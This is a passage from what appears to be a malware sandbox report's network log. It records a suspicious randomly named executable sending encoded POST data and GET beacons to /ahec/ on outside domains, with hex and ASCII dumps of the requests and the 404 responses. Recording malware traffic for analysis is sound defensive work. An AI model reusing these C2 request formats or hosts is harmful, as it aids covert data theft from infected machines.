                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.instantconvey.com
                                                                          Origin: http://www.instantconvey.com
                                                                          Referer: http://www.instantconvey.com/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 1217
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Raw: 4b 48 63 48 3d 66 47 46 6a 6c 39 68 53 34 77 53 2b 6a 7a 59 6a 67 65 70 78 62 42 46 62 73 4e 4f 32 54 67 32 4c 56 65 62 31 65 66 4d 31 78 39 4a 61 6d 6e 44 79 30 6a 37 37 43 79 57 48 67 42 6c 58 65 4b 68 4a 72 58 72 75 6b 68 71 6e 6a 63 34 4d 70 6f 70 32 5a 48 66 6f 4e 33 67 69 76 39 61 62 79 46 62 32 50 2b 6a 59 2b 2f 38 6b 56 37 6f 4f 69 71 2b 74 44 34 74 77 71 30 42 61 66 6e 5a 53 61 66 38 70 79 6d 41 50 55 34 72 6a 5a 61 59 67 36 73 2f 39 32 73 46 57 49 36 43 31 76 48 64 73 4d 48 43 47 6a 2b 30 42 72 6b 30 55 30 51 44 6e 37 56 71 4f 61 2f 45 30 62 57 42 6f 70 64 62 44 42 62 32 6b 63 6f 47 46 65 61 4f 47 79 70 75 59 79 57 4c 31 38 4b 37 68 4e 2f 6a 59 7a 75 6c 49 63 64 36 2f 50 63 62 62 4e 30 6c 6d 52 45 74 46 59 36 5a 4f 48 72 76 45 4b 53 6c 75 51 63 6d 42 48 4e 73 43 44 77 69 6c 45 62 39 57 43 57 32 43 6c 42 58 33 4f 31 44 73 6c 57 41 37 74 63 78 39 68 33 6f 4a 5a 61 74 65 42 30 66 6c 73 76 6e 54 6d 73 75 4a 31 78 32 6d 50 73 34 42 65 2f 34 67 7a 4c 36 74 44 64 34 39 53 56 36 36 74 39 58 6b 49 4d 6c 6c 6b 4a 59 4a 44 4d 67 6a 70 64 2f 6b 39 39 6a 66 2b 33 79 49 6a 4f 6c 36 66 6e 45 68 56 4b 64 6a 4c 4c 56 34 66 6f 55 6d 4b 4c 69 48 4d 55 6a 61 67 5a 4d 49 35 39 47 50 47 6e 58 59 44 58 6a 70 58 4f 55 30 56 4a 76 76 73 61 65 58 33 4d 47 42 39 6e 4c 41 39 6e 75 5a 34 42 7a 4b 66 70 32 70 51 39 52 38 63 47 75 79 51 47 75 50 71 39 49 32 5a 36 4f 70 6b 72 79 7a 50 6e 48 43 58 33 38 68 4a 75 61 76 6f 48 54 65 4d 63 64 49 48 72 6f 7a 4e 46 43 69 4b 75 78 6b 6a 44 71 4a 52 46 75 46 42 6f 45 67 43 65 6a 59 4c 33 70 37 76 4c 43 55 30 6a 66 57 54 33 31 45 49 6f 35 56 31 52 6c 70 68 6c 48 35 43 4d 43 33 36 4a 41 32 49 75 67 37 79 52 66 6a 54 34 37 6e 71 2b 58 35 75 41 75 4b 65 68 45 6a 6f 30 4c 75 69 35 62 6c 43 4e 63 2b 32 6b 63 64 59 56 72 31 79 42 6b 47 63 6e 58 4f 67 4e 37 64 2f 2b 69 4e 46 68 59 6f 32 74 54 44 72 4c 69 6e 6c 63 37 41 50 36 4e 42 6c 45 41 30 42 70 66 57 58 42 35 48 4b 58 76 55 6a 79 66 7a 78 36 6f 4a 33 48 77 68 45 50 4b 46 56 34 51 6e 65 78 2f 4b 34 77 63 41 73 34 34 52 53 62 6e 69 2f 71 55 65 5a 43 53 6f 51 4a 38 6e 6d 32 5a 39 63 2b 38 78 31 7a 44 52 58 49 65 73 52 52 67 72 51 48 4c 74 79 73 4f 4c 6b 48 39 73 77 34 44 63 39 65 70 31 54 43 42 43 4a 34 51 49 6f 69 6e 47 73 63 74 58 6f 70 52 62 4c 4e 48 6d 69 33 56 6b 68 6e 71 5a 44 73 42 34 71 77 6f 49 33 2b 71 4f 50 6f 6a 4d 75 34 72 64 48 48 2b 49 43 61 4c 4e 56 6f 70 6d 6b 59 77 6f 41 4e 50 32 4e 42 7a 64 6c 6f 48 63 57 6c 73 76 67 61 51 71 50 78 76 69 48 37 30 75 6d 2b 79 6e 6f 50 35 76 42 54 75 41 77 33 38 50 47 74 2f 46 70 52 4c 68 63 39 43 35 59 42 77 30 54 6b 2f 52 53 74 4d 6e 56 58 33 70 6f 4f 6b 50 63 4d 66 78 50 35 6e 32 52 33 59 44 32 4d 4b 50 67 49 58 47 45 6b 61 64 2f 30 65 58 36 49 42 73 63 4a 33 44 2b 54 69 6d 5a 50 76 75 4e 4e 68 32 7a 52 30 7a 62 35 55 30 4b 37 43 59 2f 2b 4e 42 45 31 4e 2b 41 78 5a 64 62 6e 2b 63 68 2f 4b 77 58 49 51 76 78 74 33 6c 39 48 65 42 73 34 69 6b 5a 69 63 4d 6e 53 35 65 39 36 4e 67 4a 52 41 55 30 54 4c 68 78 2f 6b 35 59 6b 45 33 4f 49 6a 41 73 52 6e 4d 79 6f 6c 31 58 49 73 49 2f 32 66 71 61 69 58 34 53 4b 75 49 31 30 64 4e 54 66 76 45 32 76 63 54 79 39 62 36 68 6b 76 38 2b 47 45 56 68 54 38 47 55 56 6f 66 5a 42 66 56 4c 31 79 46 7a 2f 43 55 33 6b 59 2f 2b 6f 4a 7a 31 63 65 6f 68 62 69 50 70 43 6e 48 44 71 78 31 39 66 52 68 62 65 64 5a 37 6e 4e 46 7a 6c 50 59 31 50 74 6b 4f 6a 41 59 6e 6c 44 61 6b 79 32 6f 50 5a 4b 4d 44 71 45 36 77 50 63 63 35 72 31 74 44 5a 35 31 65 31 37 68 6d 6e 67 36 6f 74 5a 70 6d 4f 6c 36 4e 44 6e 62 46 59 50 45 4b 76 55 63 58 42 41 37 71 2b 4f 65 5a 4c 64 57 63 52 2f 77 4b 44 71 4e 73 6d 51 61 51 65 4d 64 77 43 47 7a 51 61 55 47 34 6c 59 59 2f 74 71 65
                                                                          Data Ascii: KHcH=fGFjl9hS4wS+jzYjgepxbBFbsNO2Tg2LVeb1efM1x9JamnDy0j77CyWHgBlXeKhJrXrukhqnjc4Mpop2ZHfoN3giv9abyFb2P+jY+/8kV7oOiq+tD4twq0BafnZSaf8pymAPU4rjZaYg6s/92sFWI6C1vHdsMHCGj+0Brk0U0QDn7VqOa/E0bWBopdbDBb2kcoGFeaOGypuYyWL18K7hN/jYzulIcd6/PcbbN0lmREtFY6ZOHrvEKSluQcmBHNsCDwilEb9WCW2ClBX3O1DslWA7tcx9h3oJZateB0flsvnTmsuJ1x2mPs4Be/4gzL6tDd49SV66t9XkIMllkJYJDMgjpd/k99jf+3yIjOl6fnEhVKdjLLV4foUmKLiHMUjagZMI59GPGnXYDXjpXOU0VJvvsaeX3MGB9nLA9nuZ4BzKfp2pQ9R8cGuyQGuPq9I2Z6OpkryzPnHCX38hJuavoHTeMcdIHrozNFCiKuxkjDqJRFuFBoEgCejYL3p7vLCU0jfWT31EIo5V1RlphlH5CMC36JA2Iug7yRfjT47nq+X5uAuKehEjo0Lui5blCNc+2kcdYVr1yBkGcnXOgN7d/+iNFhYo2tTDrLinlc7AP6NBlEA0BpfWXB5HKXvUjyfzx6oJ3HwhEPKFV4Qnex/K4wcAs44RSbni/qUeZCSoQJ8nm2Z9c+8x1zDRXIesRRgrQHLtysOLkH9sw4Dc9ep1TCBCJ4QIoinGsctXopRbLNHmi3VkhnqZDsB4qwoI3+qOPojMu4rdHH+ICaLNVopmkYwoANP2NBzdloHcWlsvgaQqPxviH70um+ynoP5vBTuAw38PGt/FpRLhc9C5YBw0Tk/RStMnVX3poOkPcMfxP5n2R3YD2MKPgIXGEkad/0eX6IBscJ3D+TimZPvuNNh2zR0zb5U0K7CY/+NBE1N+AxZdbn+ch/KwXIQvxt3l9HeBs4ikZicMnS5e96NgJRAU0TLhx/k5YkE3OIjAsRnMyol1XIsI/2fqaiX4SKuI10dNTfvE2vcTy9b6hkv8+GEVhT8GUVofZBfVL1yFz/CU3kY/+oJz1ceohbiPpCnHDqx19fRhbedZ7nNFzlPY1PtkOjAYnlDaky2oPZKMDqE6wPcc5r1tDZ51e17hmng6otZpmOl6NDnbFYPEKvUcXBA7q+OeZLdWcR/wKDqNsmQaQeMdwCGzQaUG4lYY/tqe
                                                                          Dec 2, 2023 18:49:04.354300022 CET533INHTTP/1.1 404 Not Found
                                                                          Date: Sat, 02 Dec 2023 17:49:04 GMT
                                                                          Server: Apache
                                                                          Content-Length: 315
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          16192.168.2.549735131.153.147.90801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:49:06.872297049 CET521OUTGET /ahec/?Vjk=-N-tntX&KHcH=SEtDmKR01RO/v1cj8toEclhnh+z+cFCFQ+LqZaILuKhM8xDFx1nbKCOFshx5Sqoz6Az3phyVzpkjs7F2QS7dClw6x6iQ2E33Xw== HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Host: www.instantconvey.com
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Dec 2, 2023 18:49:06.975440025 CET533INHTTP/1.1 404 Not Found
                                                                          Date: Sat, 02 Dec 2023 17:49:06 GMT
                                                                          Server: Apache
                                                                          Content-Length: 315
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          17192.168.2.54973694.23.162.163801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:49:12.450757980 CET818OUTPOST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.domainappraisalbot.com
                                                                          Origin: http://www.domainappraisalbot.com
                                                                          Referer: http://www.domainappraisalbot.com/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 185
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Raw: 4b 48 63 48 3d 57 44 52 70 51 76 58 4c 66 35 4b 62 7a 44 68 65 38 73 5a 4b 48 2b 6e 4e 73 46 4f 30 62 34 78 35 6c 45 74 72 6d 5a 72 57 4b 4b 45 62 32 47 72 2b 70 5a 41 63 35 44 6a 41 77 37 51 59 66 43 48 58 41 31 77 59 33 33 32 74 54 5a 6b 33 55 63 47 30 76 63 49 61 77 4c 38 37 4e 44 64 41 36 34 32 75 71 6d 51 32 45 79 72 7a 46 69 4f 6b 68 39 6f 31 37 6a 55 57 67 50 73 53 45 66 2b 35 5a 67 43 38 36 4c 63 49 58 61 56 6b 6f 33 37 4b 72 4d 50 6f 61 63 6f 54 33 6f 6b 55 50 79 46 6c 31 35 31 46 75 57 46 71 76 54 35 6e 49 32 54 32 32 43 6f 75 5a 41 3d 3d
                                                                          Data Ascii: KHcH=WDRpQvXLf5KbzDhe8sZKH+nNsFO0b4x5lEtrmZrWKKEb2Gr+pZAc5DjAw7QYfCHXA1wY332tTZk3UcG0vcIawL87NDdA642uqmQ2EyrzFiOkh9o17jUWgPsSEf+5ZgC86LcIXaVko37KrMPoacoT3okUPyFl151FuWFqvT5nI2T22CouZA==


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          18192.168.2.54973794.23.162.163801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:49:15.153484106 CET838OUTPOST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.domainappraisalbot.com
                                                                          Origin: http://www.domainappraisalbot.com
                                                                          Referer: http://www.domainappraisalbot.com/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 205
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Raw: 4b 48 63 48 3d 57 44 52 70 51 76 58 4c 66 35 4b 62 70 69 52 65 77 74 5a 4b 47 65 6e 4f 77 56 4f 30 55 59 78 39 6c 44 6c 72 6d 63 54 47 4a 34 51 62 34 44 58 2b 6f 59 41 63 2b 44 6a 41 37 62 51 64 62 43 47 36 41 31 4d 68 33 7a 32 74 54 5a 67 33 55 64 32 30 6f 71 41 5a 79 62 38 39 43 6a 64 47 33 59 32 75 71 6d 51 32 45 79 2f 4a 46 6d 69 6b 6d 4d 59 31 36 47 30 58 68 50 73 52 53 50 2b 35 64 67 43 34 36 4c 63 32 58 65 56 4f 6f 31 7a 4b 72 4a 6a 6f 5a 4e 6f 55 35 6f 6b 61 46 53 46 37 38 4a 73 38 31 57 6c 71 71 68 63 30 55 6d 65 64 2b 33 45 39 65 30 38 50 4f 79 73 61 50 30 35 61 79 4a 63 68 6f 61 66 41 73 4a 73 3d
                                                                          Data Ascii: KHcH=WDRpQvXLf5KbpiRewtZKGenOwVO0UYx9lDlrmcTGJ4Qb4DX+oYAc+DjA7bQdbCG6A1Mh3z2tTZg3Ud20oqAZyb89CjdG3Y2uqmQ2Ey/JFmikmMY16G0XhPsRSP+5dgC46Lc2XeVOo1zKrJjoZNoU5okaFSF78Js81Wlqqhc0Umed+3E9e08POysaP05ayJchoafAsJs=


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          19192.168.2.54973894.23.162.163801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:49:17.859364033 CET1851OUTPOST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.domainappraisalbot.com
                                                                          Origin: http://www.domainappraisalbot.com
                                                                          Referer: http://www.domainappraisalbot.com/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 1217
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Raw: 4b 48 63 48 3d 57 44 52 70 51 76 58 4c 66 35 4b 62 70 69 52 65 77 74 5a 4b 47 65 6e 4f 77 56 4f 30 55 59 78 39 6c 44 6c 72 6d 63 54 47 4a 35 6f 62 34 31 6a 2b 70 37 6f 63 2f 44 6a 41 30 4c 51 63 62 43 47 43 41 31 55 6c 33 7a 7a 59 54 62 6f 33 56 37 69 30 70 59 6f 5a 6f 4c 38 39 41 6a 64 48 36 34 32 2f 71 69 38 36 45 78 48 4a 46 6d 69 6b 6d 50 77 31 71 6a 55 58 73 76 73 53 45 66 2b 31 5a 67 43 51 36 4c 45 41 58 65 59 35 6f 42 48 4b 71 74 44 6f 56 66 41 55 6d 34 6b 50 43 53 45 6f 38 4a 51 64 31 51 42 63 71 68 70 6a 55 6c 4f 64 2f 7a 35 41 4c 31 6b 33 62 68 4d 34 43 6d 70 43 6b 38 4d 39 73 59 2f 48 36 75 43 63 4d 74 57 54 4c 37 46 33 67 4a 50 44 79 72 47 57 71 55 6f 61 6c 2f 39 41 72 33 57 6f 68 36 4c 79 4e 44 49 70 47 57 4c 35 74 6c 6d 56 59 38 41 4b 6f 68 7a 38 33 37 68 69 38 48 31 44 67 69 34 49 70 50 54 43 34 61 4d 4b 48 39 51 37 4a 38 5a 75 4c 4b 54 49 65 78 67 2b 30 33 6f 6b 30 4c 4b 47 6e 6a 4d 52 76 39 4f 64 46 6c 68 4c 77 6b 39 54 58 6b 69 32 35 57 68 77 33 54 47 47 6c 77 5a 59 49 33 37 50 77 53 53 66 74 71 4b 68 32 79 42 48 46 68 52 7a 4f 5a 4d 47 33 50 52 37 4f 2f 33 36 42 58 65 70 58 66 35 45 57 54 30 4f 56 53 38 53 47 44 61 49 54 31 71 4a 32 51 79 76 43 7a 57 41 4a 70 6b 6f 66 47 30 4a 39 44 75 43 39 35 61 6f 61 5a 65 7a 59 53 74 34 7a 32 79 34 74 54 62 57 55 41 6c 2f 41 79 70 72 4b 74 57 53 45 2b 39 49 33 56 42 76 64 79 44 57 49 32 6c 55 44 42 77 7a 66 50 4e 57 4b 6d 44 5a 42 36 52 58 44 45 76 38 57 32 52 6b 71 34 61 6b 4e 52 50 38 48 69 46 56 4a 45 2b 47 66 48 32 41 4d 67 65 70 59 35 43 62 78 6b 76 53 4e 48 70 7a 68 6d 64 49 42 61 62 75 65 4b 6f 70 77 79 37 6c 30 6e 47 43 67 50 61 4e 59 68 44 36 48 6c 43 69 58 70 56 65 32 38 54 32 35 53 32 5a 69 69 33 75 62 30 52 72 55 67 33 4d 53 6e 31 54 36 35 78 5a 49 57 55 48 69 74 54 53 51 63 79 30 78 32 7a 75 59 41 67 69 55 72 4f 45 2b 31 56 2b 63 41 38 4c 68 35 47 4b 6d 6d 4a 2f 31 69 66 78 6f 31 72 52 58 49 75 38 59 49 35 4d 52 46 49 6d 5a 41 4b 70 4b 48 35 6c 46 64 32 74 34 5a 79 42 49 33 71 67 68 4b 49 4b 59 65 50 61 6d 2f 48 54 76 46 4c 7a 2b 47 35 74 4d 2b 49 58 73 78 69 71 43 35 45 33 66 31 42 68 69 6c 71 33 69 48 76 59 73 31 51 69 44 7a 71 73 6a 4e 56 72 32 6b 6f 75 74 6e 6b 78 77 32 62 75 63 73 74 68 41 54 65 52 69 4d 72 72 53 6e 6b 75 57 37 6f 50 66 6f 74 43 50 4a 37 74 54 78 36 7a 72 64 38 31 64 50 48 4f 38 33 73 35 6f 4e 62 63 53 6e 77 52 66 44 68 31 44 4d 54 74 4b 6b 2f 54 30 34 38 32 72 76 39 38 72 6b 45 55 76 43 79 69 54 70 42 70 65 48 34 30 34 6a 38 71 64 49 61 32 47 75 43 30 58 43 68 6d 4a 66 4b 52 38 58 70 34 52 2f 63 76 2f 6b 43 37 58 4a 2f 54 68 65 58 51 39 6b 64 31 48 75 75 52 38 67 44 36 54 32 64 56 39 42 4e 74 59 33 49 6d 38 41 42 67 51 75 4b 72 73 58 33 6e 42 30 42 45 31 39 53 4b 4f 32 79 5a 6a 42 66 32 62 4b 79 31 62 55 48 75 54 2f 51 6d 32 2f 69 44 44 63 75 70 59 65 56 6e 67 69 70 31 79 42 57 4b 55 70 68 62 56 4a 6e 6c 77 6b 32 78 70 59 42 68 53 79 49 63 67 59 70 74 7a 71 6c 32 67 5a 73 71 34 79 76 6a 54 47 6f 45 2f 75 65 46 32 62 56 4c 5a 72 4a 78 68 33 50 45 4b 46 30 2b 45 4f 4d 79 54 7a 4a 6a 6f 4c 6c 63 5a 68 33 5a 30 74 58 6d 77 63 79 53 31 4f 6d 53 51 36 45 6e 53 56 51 32 76 70 57 44 4e 66 6c 57 69 53 56 6b 78 44 69 32 4b 44 66 77 49 69 79 6f 34 76 75 4d 33 6c 6f 77 33 5a 67 45 34 6d 7a 76 41 71 38 73 4a 4b 44 44 76 52 6f 45 47 59 52 61 4f 4b 56 57 5a 46 30 67 70 38 55 53 70 6d 52 32 76 42 5a 4d 47 67 58 4d 64 50 79 56 43 42 52 35 2b 75 61 4d 51 58 39 59 68 72 71 58 30 57 54 55 63 2f 6e 62 31 59 74 66 6a 5a 63 6b 79 55 58 70 73 56 2b 76 63 6b 59 48 77 79 79 74 35 61 45 30 49 30 6d 63 50 30 34 55 41 70 59 75 50 70 6d 68 52 63 59 47 34 53 75 54 45 30 74 62 67 42 41 74 75 73 45 52 4f 50 55 51 41 69 46 77
                                                                          Data Ascii: KHcH=WDRpQvXLf5KbpiRewtZKGenOwVO0UYx9lDlrmcTGJ5ob41j+p7oc/DjA0LQcbCGCA1Ul3zzYTbo3V7i0pYoZoL89AjdH642/qi86ExHJFmikmPw1qjUXsvsSEf+1ZgCQ6LEAXeY5oBHKqtDoVfAUm4kPCSEo8JQd1QBcqhpjUlOd/z5AL1k3bhM4CmpCk8M9sY/H6uCcMtWTL7F3gJPDyrGWqUoal/9Ar3Woh6LyNDIpGWL5tlmVY8AKohz837hi8H1Dgi4IpPTC4aMKH9Q7J8ZuLKTIexg+03ok0LKGnjMRv9OdFlhLwk9TXki25Whw3TGGlwZYI37PwSSftqKh2yBHFhRzOZMG3PR7O/36BXepXf5EWT0OVS8SGDaIT1qJ2QyvCzWAJpkofG0J9DuC95aoaZezYSt4z2y4tTbWUAl/AyprKtWSE+9I3VBvdyDWI2lUDBwzfPNWKmDZB6RXDEv8W2Rkq4akNRP8HiFVJE+GfH2AMgepY5CbxkvSNHpzhmdIBabueKopwy7l0nGCgPaNYhD6HlCiXpVe28T25S2Zii3ub0RrUg3MSn1T65xZIWUHitTSQcy0x2zuYAgiUrOE+1V+cA8Lh5GKmmJ/1ifxo1rRXIu8YI5MRFImZAKpKH5lFd2t4ZyBI3qghKIKYePam/HTvFLz+G5tM+IXsxiqC5E3f1Bhilq3iHvYs1QiDzqsjNVr2koutnkxw2bucsthATeRiMrrSnkuW7oPfotCPJ7tTx6zrd81dPHO83s5oNbcSnwRfDh1DMTtKk/T0482rv98rkEUvCyiTpBpeH404j8qdIa2GuC0XChmJfKR8Xp4R/cv/kC7XJ/TheXQ9kd1HuuR8gD6T2dV9BNtY3Im8ABgQuKrsX3nB0BE19SKO2yZjBf2bKy1bUHuT/Qm2/iDDcupYeVngip1yBWKUphbVJnlwk2xpYBhSyIcgYptzql2gZsq4yvjTGoE/ueF2bVLZrJxh3PEKF0+EOMyTzJjoLlcZh3Z0tXmwcyS1OmSQ6EnSVQ2vpWDNflWiSVkxDi2KDfwIiyo4vuM3low3ZgE4mzvAq8sJKDDvRoEGYRaOKVWZF0gp8USpmR2vBZMGgXMdPyVCBR5+uaMQX9YhrqX0WTUc/nb1YtfjZckyUXpsV+vckYHwyyt5aE0I0mcP04UApYuPpmhRcYG4SuTE0tbgBAtusEROPUQAiFw


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          20192.168.2.54973994.23.162.163801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:49:20.565393925 CET526OUTGET /ahec/?KHcH=bB5JTYLqXbmN0Rh+5NINP+PQjDS0UbZCl3xm8ZfdPOYVrj3MpZEcwx/57KsfYAKqEjFN/H+DNeQWefm4mYcz+JEVJR030KrPkQ==&Vjk=-N-tntX HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Host: www.domainappraisalbot.com
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Dec 2, 2023 18:49:20.746985912 CET391INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.14.0 (Ubuntu)
                                                                          Date: Sat, 02 Dec 2023 17:49:20 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 178
                                                                          Connection: close
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
